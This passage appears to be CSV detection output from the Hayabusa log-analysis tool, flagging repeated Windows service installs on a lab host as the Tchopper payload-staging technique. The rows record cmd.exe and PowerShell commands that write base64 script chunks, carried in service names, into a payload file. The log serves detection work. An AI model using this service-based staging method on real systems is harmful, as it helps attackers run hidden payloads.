-command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:47.028 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious 
Service Possibly Installed,"Svc: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:58.646 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 